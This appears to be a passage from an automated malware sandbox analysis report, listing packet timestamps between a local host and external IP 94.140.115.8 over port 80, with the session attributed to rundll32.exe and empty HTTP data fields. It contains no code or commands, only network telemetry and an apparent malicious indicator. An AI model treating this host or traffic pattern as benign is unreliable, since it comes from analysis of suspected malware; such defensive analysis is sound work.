Apr 28, 2022 15:36:11.333983898 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334008932 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334022045 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334055901 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334074974 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334095955 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334110022 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334124088 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334151983 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334194899 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344424963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344480991 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344512939 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344523907 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344552994 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344554901 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344587088 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344604969 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395009995 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395068884 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395109892 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395153046 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395190954 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395190001 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395231009 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395234108 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395262003 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395267963 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395308018 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395323038 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395803928 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395881891 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395906925 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395920038 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395947933 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395948887 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395988941 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395988941 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395998001 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396029949 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.396051884 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396070957 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.396095037 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396096945 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.396138906 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396152973 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403139114 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403198004 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403223991 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403239012 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403266907 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403280973 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403301001 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403331995 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458019972 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458168030 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458213091 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458242893 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458266020 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458316088 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458323002 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458357096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458358049 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458395004 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458399057 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458435059 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458436012 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458475113 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458479881 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458512068 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458515882 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458542109 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458553076 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458581924 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458668947 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458708048 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458710909 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458746910 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458749056 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458775997 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458791971 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458816051 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.463852882 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463875055 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463891983 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463907003 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463933945 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.463985920 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511620045 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511678934 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511703968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511719942 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511743069 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511766911 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511796951 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511816025 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511840105 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511874914 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511898994 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511914968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511924028 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511960983 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511966944 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511971951 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512216091 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512239933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512263060 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512279034 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512304068 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512330055 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512433052 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512458086 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512481928 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512497902 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512522936 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512587070 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.515275002 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515311003 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515341043 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515363932 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515396118 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515410900 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515418053 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.515448093 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.515476942 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.602821112 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.697120905 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:12.062417984 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:12.062468052 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:12.062664032 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:37:06.649815083 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49763 | 94.140.115.8 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 28, 2022 15:36:09.408600092 CEST | 1198 | OUT | |
Apr 28, 2022 15:36:09.817040920 CEST | 1200 | IN |